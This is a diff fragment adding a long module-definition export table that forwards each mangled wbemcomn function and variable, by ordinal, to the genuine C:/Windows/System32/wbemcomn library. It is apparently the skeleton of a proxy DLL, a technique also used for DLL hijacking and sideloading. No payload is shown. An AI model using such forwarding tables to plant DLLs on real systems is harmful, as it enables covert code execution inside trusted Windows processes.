+    ?Sort@CSmallArrayBlob@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Sort@CSmallArrayBlob@@QEAAXXZ @1209
+    ?Sort@CWStringArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Sort@CWStringArray@@QEAAXXZ @1210
+    ?Start@CTraceSessionControl@@SAKPEBU_GUID@@PEAVCWMITraceSettings@@@Z=C:/Windows/System32/wbemcomn.?Start@CTraceSessionControl@@SAKPEBU_GUID@@PEAVCWMITraceSettings@@@Z @1211
+    ?Stat@CBuffer@@UEAAJPEAUtagSTATSTG@@K@Z=C:/Windows/System32/wbemcomn.?Stat@CBuffer@@UEAAJPEAUtagSTATSTG@@K@Z @1212
+    ?Status@CSafeArray@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Status@CSafeArray@@QEAAHXZ @1213
+    ?Status@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Status@CVar@@QEAAHXZ @1214
+    ?Status@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Status@CVarVector@@QEAAHXZ @1215
+    ?StripToToken@WString2@@QEAAAEAV1@GH@Z=C:/Windows/System32/wbemcomn.?StripToToken@WString2@@QEAAAEAV1@GH@Z @1216
+    ?StripToToken@WString@@QEAAAEAV1@GH@Z=C:/Windows/System32/wbemcomn.?StripToToken@WString@@QEAAAEAV1@GH@Z @1217
+    ?StripWhereClause@CWQLScanner@@AEAAHXZ=C:/Windows/System32/wbemcomn.?StripWhereClause@CWQLScanner@@AEAAHXZ @1218
+    ?StripWs@WString2@@QEAAAEAV1@H@Z=C:/Windows/System32/wbemcomn.?StripWs@WString2@@QEAAAEAV1@H@Z @1219
+    ?StripWs@WString@@QEAAAEAV1@H@Z=C:/Windows/System32/wbemcomn.?StripWs@WString@@QEAAAEAV1@H@Z @1220
+    ?SwitchRow@CLike@@AEAAX_KAEAPEAE1@Z=C:/Windows/System32/wbemcomn.?SwitchRow@CLike@@AEAAX_KAEAPEAE1@Z @1221
+    ?Terminate@CBasicUnloadInstruction@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Terminate@CBasicUnloadInstruction@@QEAAXXZ @1222
+    ?ThreadMain@CExecQueue@@MEAAXPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?ThreadMain@CExecQueue@@MEAAXPEAVCThreadRecord@1@@Z @1224
+    ?TimeFormat1@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat1@CDateTimeParser@@IEAAHPEBGH@Z @1226
+    ?TimeFormat2@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat2@CDateTimeParser@@IEAAHPEBGH@Z @1227
+    ?TimeFormat3@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat3@CDateTimeParser@@IEAAHPEBGH@Z @1228
+    ?TimeFormat4@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat4@CDateTimeParser@@IEAAHPEBGH@Z @1229
+    ?TimeFormat5@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat5@CDateTimeParser@@IEAAHPEBGH@Z @1230
+    ?TimeFormat6@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat6@CDateTimeParser@@IEAAHPEBGH@Z @1231
+    ?TimeFormat7@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat7@CDateTimeParser@@IEAAHPEBGH@Z @1232
+    ?TimeFormat8@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat8@CDateTimeParser@@IEAAHPEBGH@Z @1233
+    ?TimeFormat9@CDateTimeParser@@IEAAHPEBGH@Z=C:/Windows/System32/wbemcomn.?TimeFormat9@CDateTimeParser@@IEAAHPEBGH@Z @1234
+    ?TimeToWait@CInstructionQueue@@IEAA?AVCWbemInterval@@XZ=C:/Windows/System32/wbemcomn.?TimeToWait@CInstructionQueue@@IEAA?AVCWbemInterval@@XZ @1235
+    ?ToSingleChar@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?ToSingleChar@CVar@@QEAAHXZ @1236
+    ?ToSingleChar@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?ToSingleChar@CVarVector@@QEAAHXZ @1237
+    ?ToUI4@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?ToUI4@CVar@@QEAAHXZ @1238
+    ?ToUI4@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?ToUI4@CVarVector@@QEAAHXZ @1239
+    ?TouchHead@CInstructionQueue@@IEAAXXZ=C:/Windows/System32/wbemcomn.?TouchHead@CInstructionQueue@@IEAAXXZ @1240
+    ?Transform@MD5@@SAXPEAXIQEAE@Z=C:/Windows/System32/wbemcomn.?Transform@MD5@@SAXPEAXIQEAE@Z @1241
+    ?Transform@SHA256@@SAXPEAXIQEAE@Z=C:/Windows/System32/wbemcomn.?Transform@SHA256@@SAXPEAXIQEAE@Z @1242
+    ?TranslateIntrinsic@CAbstractQl1Parser@@KAKPEBG@Z=C:/Windows/System32/wbemcomn.?TranslateIntrinsic@CAbstractQl1Parser@@KAKPEBG@Z @1243
+    ?Trim@CFlexArray@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Trim@CFlexArray@@QEAAXXZ @1244
+    ?Trim@CSafeArray@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Trim@CSafeArray@@QEAAHXZ @1245
+    ?Trim@CSmallArrayBlob@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Trim@CSmallArrayBlob@@QEAAXXZ @1246
+    ?TruncAtLToken@WString2@@QEAAAEAV1@G@Z=C:/Windows/System32/wbemcomn.?TruncAtLToken@WString2@@QEAAAEAV1@G@Z @1247
+    ?TruncAtLToken@WString@@QEAAAEAV1@G@Z=C:/Windows/System32/wbemcomn.?TruncAtLToken@WString@@QEAAAEAV1@G@Z @1248
+    ?TruncAtRToken@WString2@@QEAAAEAV1@G@Z=C:/Windows/System32/wbemcomn.?TruncAtRToken@WString2@@QEAAAEAV1@G@Z @1249
+    ?TruncAtRToken@WString@@QEAAAEAV1@G@Z=C:/Windows/System32/wbemcomn.?TruncAtRToken@WString@@QEAAAEAV1@G@Z @1250
+    ?TypeToText@CVar@@SAPEAGH@Z=C:/Windows/System32/wbemcomn.?TypeToText@CVar@@SAPEAGH@Z @1251
+    ?Unaccess@CSafeArray@@QEAAJXZ=C:/Windows/System32/wbemcomn.?Unaccess@CSafeArray@@QEAAJXZ @1253
+    ?UnaccessRawArray@CVarVector@@QEAAJXZ=C:/Windows/System32/wbemcomn.?UnaccessRawArray@CVarVector@@QEAAJXZ @1254
+    ?UnbindPtr@CFlexArray@@QEAAPEAPEAXXZ=C:/Windows/System32/wbemcomn.?UnbindPtr@CFlexArray@@QEAAPEAPEAXXZ @1255
+    ?UnbindPtr@WString2@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?UnbindPtr@WString2@@QEAAPEAGXZ @1256
+    ?UnbindPtr@WString@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?UnbindPtr@WString@@QEAAPEAGXZ @1257
+    ?UnblockedWaitForSingleObject@CExecQueue@@MEAAKPEAXKPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?UnblockedWaitForSingleObject@CExecQueue@@MEAAKPEAXKPEAVCThreadRecord@1@@Z @1258
+    ?UncompressBuffer@CMRCICompression@@QEAAIPEAEK0KW4CompressionLevel@1@@Z=C:/Windows/System32/wbemcomn.?UncompressBuffer@CMRCICompression@@QEAAIPEAEK0KW4CompressionLevel@1@@Z @1259
+    ?UncompressFile@CMRCICompression@@QEAAHPEBG0@Z=C:/Windows/System32/wbemcomn.?UncompressFile@CMRCICompression@@QEAAHPEBG0@Z @1260
+    ?UncompressFileV1@CMRCICompression@@IEAAHHH@Z=C:/Windows/System32/wbemcomn.?UncompressFileV1@CMRCICompression@@IEAAHHH@Z @1261
+    ?UninitializeThread@CExecQueue@@MEAAXXZ=C:/Windows/System32/wbemcomn.?UninitializeThread@CExecQueue@@MEAAXXZ @1262
+    ?Union@CWStringArray@@SAXAEAV1@00@Z=C:/Windows/System32/wbemcomn.?Union@CWStringArray@@SAXAEAV1@00@Z @1263
+    ?Unlock@?$CLockableFlexArray@VCStaticCritSec@@@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Unlock@?$CLockableFlexArray@VCStaticCritSec@@@@QEAAXXZ @1264
+    ?Unlock@CClientOpsNode@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Unlock@CClientOpsNode@@QEAAXXZ @1265
+    ?UnlockRegion@CBuffer@@UEAAJT_ULARGE_INTEGER@@0K@Z=C:/Windows/System32/wbemcomn.?UnlockRegion@CBuffer@@UEAAJT_ULARGE_INTEGER@@0K@Z @1266
+    ?Unqueue@CFlexQueue@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?Unqueue@CFlexQueue@@QEAAPEAXXZ @1267
+    ?Unquote@WString2@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Unquote@WString2@@QEAAXXZ @1268
+    ?Unquote@WString@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Unquote@WString@@QEAAXXZ @1269
+    ?UnregisterCMIFlushRepositoryCacheHook@CWbemInstallObject@@SAXXZ=C:/Windows/System32/wbemcomn.?UnregisterCMIFlushRepositoryCacheHook@CWbemInstallObject@@SAXXZ @1270
+    ?UpdateChildren@CClientOpsNode@@AEAAXPEAV1@@Z=C:/Windows/System32/wbemcomn.?UpdateChildren@CClientOpsNode@@AEAAXPEAV1@@Z @1272
+    ?ValidateMemSize@CWin32DefaultArena@@SAHH@Z=C:/Windows/System32/wbemcomn.?ValidateMemSize@CWin32DefaultArena@@SAHH@Z @1273
+    ?WaitAndPeek@CInstructionQueue@@QEAAJAEAPEAVCTimerInstruction@@AEAVCWbemTime@@@Z=C:/Windows/System32/wbemcomn.?WaitAndPeek@CInstructionQueue@@QEAAJAEAPEAVCTimerInstruction@@AEAVCWbemTime@@@Z @1276
+    ?WaitForResumption@CHaltable@@QEAAJXZ=C:/Windows/System32/wbemcomn.?WaitForResumption@CHaltable@@QEAAJXZ @1277
+    ?WaitForSingleObjectWhileBusy@CExecQueue@@MEAAKPEAXKPEAVCThreadRecord@1@@Z=C:/Windows/System32/wbemcomn.?WaitForSingleObjectWhileBusy@CExecQueue@@MEAAKPEAXKPEAVCThreadRecord@1@@Z @1278
+    ?WbemHeapFree@CWin32DefaultArena@@SAXXZ=C:/Windows/System32/wbemcomn.?WbemHeapFree@CWin32DefaultArena@@SAXXZ @1280
+    ?WbemHeapInitialize@CWin32DefaultArena@@SAHPEAX@Z=C:/Windows/System32/wbemcomn.?WbemHeapInitialize@CWin32DefaultArena@@SAHPEAX@Z @1281
+    ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z=C:/Windows/System32/wbemcomn.?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z @1282
+    ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z=C:/Windows/System32/wbemcomn.?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z @1283
+    ?WbemMemReAlloc@CWin32DefaultArena@@SAPEAXPEAX_K@Z=C:/Windows/System32/wbemcomn.?WbemMemReAlloc@CWin32DefaultArena@@SAPEAXPEAX_K@Z @1284
+    ?WbemMemSize@CWin32DefaultArena@@SA_KPEAX@Z=C:/Windows/System32/wbemcomn.?WbemMemSize@CWin32DefaultArena@@SA_KPEAX@Z @1285
+    ?WbemOutOfMemory@CWin32DefaultArena@@SAHXZ=C:/Windows/System32/wbemcomn.?WbemOutOfMemory@CWin32DefaultArena@@SAHXZ @1286
+    ?WbemSysAllocString@CWin32DefaultArena@@SAPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?WbemSysAllocString@CWin32DefaultArena@@SAPEAGPEBG@Z @1289
+    ?WbemSysAllocStringByteLen@CWin32DefaultArena@@SAPEAGPEBDI@Z=C:/Windows/System32/wbemcomn.?WbemSysAllocStringByteLen@CWin32DefaultArena@@SAPEAGPEBDI@Z @1290
+    ?WbemSysAllocStringLen@CWin32DefaultArena@@SAPEAGPEBGI@Z=C:/Windows/System32/wbemcomn.?WbemSysAllocStringLen@CWin32DefaultArena@@SAPEAGPEBGI@Z @1291
+    ?WbemSysFreeString@CWin32DefaultArena@@SAXPEAG@Z=C:/Windows/System32/wbemcomn.?WbemSysFreeString@CWin32DefaultArena@@SAXPEAG@Z @1292
+    ?WbemSysReAllocString@CWin32DefaultArena@@SAHPEAPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?WbemSysReAllocString@CWin32DefaultArena@@SAHPEAPEAGPEBG@Z @1293
+    ?WbemSysReAllocStringLen@CWin32DefaultArena@@SAHPEAPEAGPEBGI@Z=C:/Windows/System32/wbemcomn.?WbemSysReAllocStringLen@CWin32DefaultArena@@SAHPEAPEAGPEBGI@Z @1294
+    ?WildcardTest@WString@@QEBAHPEBG@Z=C:/Windows/System32/wbemcomn.?WildcardTest@WString@@QEBAHPEBG@Z @1296
+    ?Write@CBuffer@@UEAAJPEBXKPEAK@Z=C:/Windows/System32/wbemcomn.?Write@CBuffer@@UEAAJPEBXKPEAK@Z @1298
+    ?Write@CMemoryLog@@QEAAXJ@Z=C:/Windows/System32/wbemcomn.?Write@CMemoryLog@@QEAAXJ@Z @1299
+    ?Write@CMemoryLog@@QEAAXPEAXK@Z=C:/Windows/System32/wbemcomn.?Write@CMemoryLog@@QEAAXPEAXK@Z @1300
+    ?WriteLPWSTR@CBuffer@@QEAAJPEBG@Z=C:/Windows/System32/wbemcomn.?WriteLPWSTR@CBuffer@@QEAAJPEBG@Z @1301
+    ?WriteToRegistry@CWMITraceSettings@@QEAAKPEBG@Z=C:/Windows/System32/wbemcomn.?WriteToRegistry@CWMITraceSettings@@QEAAKPEBG@Z @1302
+    ?_Alloc@CMUILocale@@SAPEAX_K@Z=C:/Windows/System32/wbemcomn.?_Alloc@CMUILocale@@SAPEAX_K@Z @1303
+    ?_Free@CMUILocale@@SAHPEAX@Z=C:/Windows/System32/wbemcomn.?_Free@CMUILocale@@SAHPEAX@Z @1305
+    ?_GetSystemDefaultLocale@CMUILocale@@SAJPEAPEAGK@Z=C:/Windows/System32/wbemcomn.?_GetSystemDefaultLocale@CMUILocale@@SAJPEAPEAGK@Z @1306
+    ?_GetSystemDefaultLocaleName@CMUILocale@@SAJPEAPEAG@Z=C:/Windows/System32/wbemcomn.?_GetSystemDefaultLocaleName@CMUILocale@@SAJPEAPEAG@Z @1307
+    ?_GetThreadPreferredUILanguages@CMUILocale@@SAJKPEAKPEAG0@Z=C:/Windows/System32/wbemcomn.?_GetThreadPreferredUILanguages@CMUILocale@@SAJKPEAKPEAG0@Z @1308
+    ?_LCIDToLocaleName@CMUILocale@@SAJKPEAGHK@Z=C:/Windows/System32/wbemcomn.?_LCIDToLocaleName@CMUILocale@@SAJKPEAGHK@Z @1310
+    ?_LocaleNameToLCID@CMUILocale@@SAJPEAGKPEAK@Z=C:/Windows/System32/wbemcomn.?_LocaleNameToLCID@CMUILocale@@SAJPEAGKPEAK@Z @1311
+    ?_RetrieveSidFromCall@CIdentitySecurity@@AEAAJAEAVCNtSid@@@Z=C:/Windows/System32/wbemcomn.?_RetrieveSidFromCall@CIdentitySecurity@@AEAAJAEAVCNtSid@@@Z @1312
+    ?_SetThreadPreferredUILanguages@CMUILocale@@SAJKPEBGPEAK@Z=C:/Windows/System32/wbemcomn.?_SetThreadPreferredUILanguages@CMUILocale@@SAJKPEBGPEAK@Z @1313
+    ?_ThreadEntry@CExecQueue@@KAKPEAX@Z=C:/Windows/System32/wbemcomn.?_ThreadEntry@CExecQueue@@KAKPEAX@Z @1314
+    ?aggregate_by@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?aggregate_by@CAbstractQl1Parser@@IEAAHXZ @1316
+    ?aggregate_within@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?aggregate_within@CAbstractQl1Parser@@IEAAHXZ @1317
+    ?aggregation_params@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?aggregation_params@CAbstractQl1Parser@@IEAAHXZ @1318
+    ?anyFailed_@CStaticCritSec@@0HA=C:/Windows/System32/wbemcomn.?anyFailed_@CStaticCritSec@@0HA @1319
+    ?anyFailure@CStaticCritSec@@SAHXZ=C:/Windows/System32/wbemcomn.?anyFailure@CStaticCritSec@@SAHXZ @1320
+    ?charbuf@CBaseMrciCompression@@AEAAXI@Z=C:/Windows/System32/wbemcomn.?charbuf@CBaseMrciCompression@@AEAAXI@Z @1322
+    ?class_name@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?class_name@CAbstractQl1Parser@@IEAAHXZ @1323
+    ?comp_operator@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?comp_operator@CAbstractQl1Parser@@IEAAHXZ @1324
+    ?equiv_operator@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?equiv_operator@CAbstractQl1Parser@@IEAAHXZ @1325
+    ?expandstring@CBaseMrciCompression@@AEAAXPEAPEAEII@Z=C:/Windows/System32/wbemcomn.?expandstring@CBaseMrciCompression@@AEAAXPEAPEAEII@Z @1326
+    ?expr2@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?expr2@CAbstractQl1Parser@@IEAAHXZ @1327
+    ?expr@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?expr@CAbstractQl1Parser@@IEAAHXZ @1328
+    ?finalize@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?finalize@CAbstractQl1Parser@@IEAAHXZ @1329
+    ?getbit@CBaseMrciCompression@@AEAAIXZ=C:/Windows/System32/wbemcomn.?getbit@CBaseMrciCompression@@AEAAIXZ @1330
+    ?getbits@CBaseMrciCompression@@AEAAII@Z=C:/Windows/System32/wbemcomn.?getbits@CBaseMrciCompression@@AEAAII@Z @1331
+    ?inithash@CBaseMrciCompression@@AEAAXXZ=C:/Windows/System32/wbemcomn.?inithash@CBaseMrciCompression@@AEAAXXZ @1332
+    ?isValid@CHaltable@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?isValid@CHaltable@@QEAA_NXZ @1333
+    ?is_operator@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?is_operator@CAbstractQl1Parser@@IEAAHXZ @1334
+    ?leading_ident_expr@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?leading_ident_expr@CAbstractQl1Parser@@IEAAHXZ @1337
+    ?m_bOffline@CWbemInstallObject@@0_NA=C:/Windows/System32/wbemcomn.?m_bOffline@CWbemInstallObject@@0_NA @1338
+    ?m_csFunctionPointers@CMUILocale@@0VCCritSec@@A=C:/Windows/System32/wbemcomn.?m_csFunctionPointers@CMUILocale@@0VCCritSec@@A @1339
+    ?m_csFunctionPointers@CPublishWMIOperationEvent@@0VCCritSec@@A=C:/Windows/System32/wbemcomn.?m_csFunctionPointers@CPublishWMIOperationEvent@@0VCCritSec@@A @1340
+    ?m_csGlobal@CClientOpsNode@@0VCCritSec@@A=C:/Windows/System32/wbemcomn.?m_csGlobal@CClientOpsNode@@0VCCritSec@@A @1341
+    ?m_fEventActivityIdControl@CPublishWMIOperationEvent@@2P6AKKPEAU_GUID@@@ZEA=C:/Windows/System32/wbemcomn.?m_fEventActivityIdControl@CPublishWMIOperationEvent@@2P6AKKPEAU_GUID@@@ZEA @1342
+    ?m_fEventEnabled@CPublishWMIOperationEvent@@0P6AE_KPEBU_EVENT_DESCRIPTOR@@@ZEA=C:/Windows/System32/wbemcomn.?m_fEventEnabled@CPublishWMIOperationEvent@@0P6AE_KPEBU_EVENT_DESCRIPTOR@@@ZEA @1343
+    ?m_fEventRegister@CPublishWMIOperationEvent@@0P6AKPEBU_GUID@@P6AX0KE_K1PEAU_EVENT_FILTER_DESCRIPTOR@@PEAX@Z3PEA_K@ZEA=C:/Windows/System32/wbemcomn.?m_fEventRegister@CPublishWMIOperationEvent@@0P6AKPEBU_GUID@@P6AX0KE_K1PEAU_EVENT_FILTER_DESCRIPTOR@@PEAX@Z3PEA_K@ZEA @1344
+    ?m_fEventUnregister@CPublishWMIOperationEvent@@0P6AK_K@ZEA=C:/Windows/System32/wbemcomn.?m_fEventUnregister@CPublishWMIOperationEvent@@0P6AK_K@ZEA @1345
+    ?m_fEventWrite@CPublishWMIOperationEvent@@0P6AK_KPEAU_EVENT_DESCRIPTOR@@KPEAU_EVENT_DATA_DESCRIPTOR@@@ZEA=C:/Windows/System32/wbemcomn.?m_fEventWrite@CPublishWMIOperationEvent@@0P6AK_KPEAU_EVENT_DESCRIPTOR@@KPEAU_EVENT_DATA_DESCRIPTOR@@@ZEA @1346
+    ?m_fEventWriteTransfer@CPublishWMIOperationEvent@@2P6AK_KPEBU_EVENT_DESCRIPTOR@@PEBU_GUID@@2KPEAU_EVENT_DATA_DESCRIPTOR@@@ZEA=C:/Windows/System32/wbemcomn.?m_fEventWriteTransfer@CPublishWMIOperationEvent@@2P6AK_KPEBU_EVENT_DESCRIPTOR@@PEBU_GUID@@2KPEAU_EVENT_DATA_DESCRIPTOR@@@ZEA @1347
+    ?m_fGetLocaleInfoEx@CMUILocale@@0PEAXEA=C:/Windows/System32/wbemcomn.?m_fGetLocaleInfoEx@CMUILocale@@0PEAXEA @1348
+    ?m_fGetSystemDefaultLocaleName@CMUILocale@@0PEAXEA=C:/Windows/System32/wbemcomn.?m_fGetSystemDefaultLocaleName@CMUILocale@@0PEAXEA @1349
+    ?m_fGetThreadPreferredUILanguages@CMUILocale@@0PEAXEA=C:/Windows/System32/wbemcomn.?m_fGetThreadPreferredUILanguages@CMUILocale@@0PEAXEA @1350
+    ?m_fLCIDToLocaleName@CMUILocale@@0PEAXEA=C:/Windows/System32/wbemcomn.?m_fLCIDToLocaleName@CMUILocale@@0PEAXEA @1351
+    ?m_fLocaleNameToLCID@CMUILocale@@0PEAXEA=C:/Windows/System32/wbemcomn.?m_fLocaleNameToLCID@CMUILocale@@0PEAXEA @1352
+    ?m_fSetThreadPreferredUILanguages@CMUILocale@@0PEAXEA=C:/Windows/System32/wbemcomn.?m_fSetThreadPreferredUILanguages@CMUILocale@@0PEAXEA @1353
+    ?m_hAdvAPI32@CPublishWMIOperationEvent@@0PEAUHINSTANCE__@@EA=C:/Windows/System32/wbemcomn.?m_hAdvAPI32@CPublishWMIOperationEvent@@0PEAUHINSTANCE__@@EA @1354
+    ?m_hKernel32@CMUILocale@@0PEAUHINSTANCE__@@EA=C:/Windows/System32/wbemcomn.?m_hKernel32@CMUILocale@@0PEAUHINSTANCE__@@EA @1355
+    ?m_pEnvironmentMap@CWbemInstallObject@@0PEAV?$map@PEBGPEBGU?$SZLess@PEBG@@V?$wbem_allocator@PEBG@@@std@@EA=C:/Windows/System32/wbemcomn.?m_pEnvironmentMap@CWbemInstallObject@@0PEAV?$map@PEBGPEBGU?$SZLess@PEBG@@V?$wbem_allocator@PEBG@@@std@@EA @1356
+    ?m_pfFlushCache@CWbemInstallObject@@0P6AJH@ZEA=C:/Windows/System32/wbemcomn.?m_pfFlushCache@CWbemInstallObject@@0P6AJH@ZEA @1357
+    ?m_publisher@CPublishWMIOperationEvent@@2_KA=C:/Windows/System32/wbemcomn.?m_publisher@CPublishWMIOperationEvent@@2_KA @1358
+    ?m_pwszAutoRecoverPath@CWbemInstallObject@@0PEBGEB=C:/Windows/System32/wbemcomn.?m_pwszAutoRecoverPath@CWbemInstallObject@@0PEBGEB @1359
+    ?m_pwszBinaryPath@CWbemInstallObject@@0PEBGEB=C:/Windows/System32/wbemcomn.?m_pwszBinaryPath@CWbemInstallObject@@0PEBGEB @1360
+    ?m_pwszRegistryPathCIMOM@CWbemInstallObject@@0PEBGEB=C:/Windows/System32/wbemcomn.?m_pwszRegistryPathCIMOM@CWbemInstallObject@@0PEBGEB @1361
+    ?m_pwszRegistryPathWbem@CWbemInstallObject@@0PEBGEB=C:/Windows/System32/wbemcomn.?m_pwszRegistryPathWbem@CWbemInstallObject@@0PEBGEB @1362
+    ?m_pwszRepositoryPath@CWbemInstallObject@@0PEBGEB=C:/Windows/System32/wbemcomn.?m_pwszRepositoryPath@CWbemInstallObject@@0PEBGEB @1363
+    ?m_rgClsidDllMap@CWbemInstallObject@@0PAUClsidDllMapping@@A=C:/Windows/System32/wbemcomn.?m_rgClsidDllMap@CWbemInstallObject@@0PAUClsidDllMapping@@A @1364
+    ?m_rgDllModules@CWbemInstallObject@@0PAUDllModuleHandle@@A=C:/Windows/System32/wbemcomn.?m_rgDllModules@CWbemInstallObject@@0PAUDllModuleHandle@@A @1365
+    ?mrci1outsingle@CBaseMrciCompression@@AEAAXI@Z=C:/Windows/System32/wbemcomn.?mrci1outsingle@CBaseMrciCompression@@AEAAXI@Z @1366
+    ?mrci1outstring@CBaseMrciCompression@@AEAAXII@Z=C:/Windows/System32/wbemcomn.?mrci1outstring@CBaseMrciCompression@@AEAAXII@Z @1367
+    ?mrci2outsingle@CBaseMrciCompression@@AEAAXI@Z=C:/Windows/System32/wbemcomn.?mrci2outsingle@CBaseMrciCompression@@AEAAXI@Z @1368
+    ?mrci2outstring@CBaseMrciCompression@@AEAAXII@Z=C:/Windows/System32/wbemcomn.?mrci2outstring@CBaseMrciCompression@@AEAAXII@Z @1369
+    ?ms_XXX_Locale_From_LCID@CMUILocale@@SAJKPEAPEAG@Z=C:/Windows/System32/wbemcomn.?ms_XXX_Locale_From_LCID@CMUILocale@@SAJKPEAPEAG@Z @1370
+    ?ms_XXX_Locale_To_LCID@CMUILocale@@SAJPEBGPEAK@Z=C:/Windows/System32/wbemcomn.?ms_XXX_Locale_To_LCID@CMUILocale@@SAJPEBGPEAK@Z @1371
+    ?mstatic_lNumInits@CExecQueue@@1JA=C:/Windows/System32/wbemcomn.?mstatic_lNumInits@CExecQueue@@1JA @1373
+    ?opt_aggregation@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?opt_aggregation@CAbstractQl1Parser@@IEAAHXZ @1374
+    ?opt_having@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?opt_having@CAbstractQl1Parser@@IEAAHXZ @1375
+    ?opt_where@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?opt_where@CAbstractQl1Parser@@IEAAHXZ @1376
+    ?outlength@CBaseMrciCompression@@AEAAXI@Z=C:/Windows/System32/wbemcomn.?outlength@CBaseMrciCompression@@AEAAXI@Z @1377
+    ?parse@CAbstractQl1Parser@@IEAAHH@Z=C:/Windows/System32/wbemcomn.?parse@CAbstractQl1Parser@@IEAAHH@Z @1378
+    ?parse_property_name@CAbstractQl1Parser@@IEAAHAEAVCPropertyName@@@Z=C:/Windows/System32/wbemcomn.?parse_property_name@CAbstractQl1Parser@@IEAAHAEAVCPropertyName@@@Z @1379
+    ?prop_list@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?prop_list@CAbstractQl1Parser@@IEAAHXZ @1380
+    ?prop_list_2@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?prop_list_2@CAbstractQl1Parser@@IEAAHXZ @1381
+    ?property_name@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?property_name@CAbstractQl1Parser@@IEAAHXZ @1382
+    ?putbits@CBaseMrciCompression@@AEAAXII@Z=C:/Windows/System32/wbemcomn.?putbits@CBaseMrciCompression@@AEAAXII@Z @1383
+    ?rel_operator@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?rel_operator@CAbstractQl1Parser@@IEAAHXZ @1384
+    ?sMatachedWithOneChar@CLike@@0EB=C:/Windows/System32/wbemcomn.?sMatachedWithOneChar@CLike@@0EB @1385
+    ?sMatachedWithWildcardChar@CLike@@0EB=C:/Windows/System32/wbemcomn.?sMatachedWithWildcardChar@CLike@@0EB @1386
+    ?sNoMatch@CLike@@0EB=C:/Windows/System32/wbemcomn.?sNoMatch@CLike@@0EB @1387
+    ?simple_expr@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?simple_expr@CAbstractQl1Parser@@IEAAHXZ @1388
+    ?staticRead@CBasicUnloadInstruction@@SA?AVCWbemInterval@@PEAUIWbemServices@@PEAUIWbemContext@@PEBG@Z=C:/Windows/System32/wbemcomn.?staticRead@CBasicUnloadInstruction@@SA?AVCWbemInterval@@PEAUIWbemServices@@PEAUIWbemContext@@PEBG@Z @1389
+    ?term2@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?term2@CAbstractQl1Parser@@IEAAHXZ @1390
+    ?term@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?term@CAbstractQl1Parser@@IEAAHXZ @1391
+    ?tolerance@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?tolerance@CAbstractQl1Parser@@IEAAHXZ @1392
+    ?trailing_const_expr@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?trailing_const_expr@CAbstractQl1Parser@@IEAAHXZ @1393
+    ?trailing_ident_expr@CAbstractQl1Parser@@IEAAHXZ=C:/Windows/System32/wbemcomn.?trailing_ident_expr@CAbstractQl1Parser@@IEAAHXZ @1394
